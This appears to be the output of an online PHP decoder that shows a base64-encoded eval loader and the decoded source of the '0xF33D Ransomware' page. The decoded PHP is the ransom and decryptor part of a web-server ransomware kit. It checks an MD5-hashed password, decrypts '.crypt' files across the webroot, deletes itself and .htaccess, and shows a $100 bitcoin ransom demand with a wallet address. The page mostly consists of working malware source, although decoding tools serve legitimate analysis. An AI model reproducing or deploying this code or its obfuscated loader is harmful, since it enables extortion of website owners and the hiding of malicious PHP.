PHP Decode

<?php eval('?>'.base64_decode('PHRpdGxlPjB4RjMzRCBSYW5zb213YXJlPC90aXRsZT4KPGxpbmsgcmVsPSJ..

Decoded Output

?><title>0xF33D Ransomware</title>
<link rel="shortcut icon" type="image/x-icon" href="https://img.deusm.com/darkreading/bh-asia-facebook-profile.png">
<style>
html {
background: black;
color: white;
}
input { background: transparent; color: white; border: 1px solid white; }
</style>
<?php
error_reporting(0);
$input = $_POST['pass'];
$pass = "659e6447592d689a21a59a16ec4f23e9";
if(isset($input)) {
if(md5($input) == $pass) {
function decfile($filename){
	if (strpos($filename, '.crypt') === FALSE) {
	return;
	}
	$decrypted = gzinflate(file_get_contents($filename));
	file_put_contents(str_replace('.crypt', '', $filename), $decrypted);
	unlink('crypt.php');
	unlink('.htaccess');
	unlink($filename);
	echo "$filename Decrypted !!!<br>";
}

function decdir($dir){
	$files = array_diff(scandir($dir), array('.', '..'));
		foreach($files as $file) {
			if(is_dir($dir."/".$file)){
				decdir($dir."/".$file);
			}else {
				decfile($dir."/".$file);
		}
	}
}

decdir($_SERVER['DOCUMENT_ROOT']);
echo "<br>Webroot Decrypted<br>";
unlink($_SERVER['PHP_SELF']);
unlink('.htaccess');
copy('htabackup','.htaccess');
echo 'Success !!!';
} else {
echo 'Failed Password !!!';
}
exit();
}
?>
<center>
<h1>0xF33D Ransomware</h1>
<img height="200" src="https://i.screenshot.net/k4z06un"/>
<br><br>
<h3>Your Website Is Encrypted</h3>


Don't Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First
<br>
Send Me $100 For Back Your Website <br><br>
Bitcoin Address : <input type="text" value="1J2rKWJq6NVwVdhFU7w3xKxUeUtx7xadh1" readonly>
<br><br>
<form enctype="multipart/form-data" method="post">
<input type="text" name="pass" placeholder="Password"> <input type="submit" value="Decrypt">
</form>
<br>Contact Mail : [email protected]<?php 


Original Code


Function Calls

base64_decode 1

Variables

None

Stats

MD5 f187160b27882b96c1bdad5e1372af04
Eval Count 1
Decode Time 91 ms